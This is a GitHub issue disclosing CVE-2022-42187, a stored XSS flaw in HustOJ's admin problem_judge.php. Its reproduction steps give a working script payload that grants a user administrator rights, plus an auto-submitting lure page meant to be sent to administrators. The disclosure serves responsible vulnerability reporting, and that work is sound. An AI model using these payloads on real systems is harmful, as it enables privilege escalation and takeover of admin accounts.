Headline
CVE-2022-42187: XSS Vulnerability in /admin/problem_judge.php · Issue #866 · zhblue/hustoj
Hustoj 22.09.22 has a XSS Vulnerability in /admin/problem_judge.php.
描述问题
XSS Vulnerability exists in
echo $row[‘input_text’]."\n";
如何复现
Steps to reproduce the behavior:
- POST text with xss script to submit.php
for example:
id=-1000&language=1&source=asdasdasdasdasd&input_text=<script src="/template/bs3/jquery.min.js"></script><script>$.get(“/admin/privilege_add.php”).done(function(data){ re=/name="postkey" value="([\w]%2B?)"/g; $.post(“/admin/privilege_add.php",{"postkey":re.exec(data)[1],"user_id":"username","rightstr":"administrator","valuestr":"true” ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)}) }) </script>
Then you can get a sid.
- Send malicious links to administrators
example:
<body> <script type="text/javascript"> function post(URL, PARAMS) { var temp = document.createElement(“form”); temp.action = URL; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement(“textarea”); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); return temp; } post("http://192.168.0.25:8080/admin/problem_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})
</script> </body>